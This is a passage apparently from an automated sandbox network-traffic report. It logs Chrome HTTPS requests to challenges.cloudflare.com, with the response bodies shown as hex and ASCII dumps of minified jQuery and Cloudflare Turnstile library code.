74 2e 6e 6f
                                                            Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                            2025-01-07 20:28:54 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                            Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                            2025-01-07 20:28:54 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                            Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                            2025-01-07 20:28:54 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                            Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                            2025-01-07 20:28:54 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                            Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                            2025-01-07 20:28:54 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                            Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                            2025-01-07 20:28:54 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                            Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                            2025-01-07 20:28:54 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                            Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.1649708104.18.95.414436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:28:54 UTC649OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://brh5.bughtswo.com/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 20:28:54 UTC386INHTTP/1.1 302 Found
                                                            Date: Tue, 07 Jan 2025 20:28:54 GMT
                                                            Content-Length: 0
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                            cross-origin-resource-policy: cross-origin
                                                            location: /turnstile/v0/g/849bfe45bf45/api.js
                                                            Server: cloudflare
                                                            CF-RAY: 8fe6b2694ac542c6-EWR
                                                            alt-svc: h3=":443"; ma=86400


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.1649710104.18.95.414436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:28:55 UTC648OUTGET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://brh5.bughtswo.com/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 20:28:55 UTC471INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 20:28:55 GMT
                                                            Content-Type: application/javascript; charset=UTF-8
                                                            Content-Length: 47521
                                                            Connection: close
                                                            accept-ranges: bytes
                                                            last-modified: Thu, 02 Jan 2025 13:52:36 GMT
                                                            cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                            access-control-allow-origin: *
                                                            cross-origin-resource-policy: cross-origin
                                                            Server: cloudflare
                                                            CF-RAY: 8fe6b26d1901efa9-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 20:28:55 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                            Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                            2025-01-07 20:28:55 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                            Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                            2025-01-07 20:28:55 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                            Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                            2025-01-07 20:28:55 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                            Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                            2025-01-07 20:28:55 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                            Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                            2025-01-07 20:28:55 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                            Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                            2025-01-07 20:28:55 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                            Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                            2025-01-07 20:28:55 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                            Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                            2025-01-07 20:28:55 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                            Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                            2025-01-07 20:28:55 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
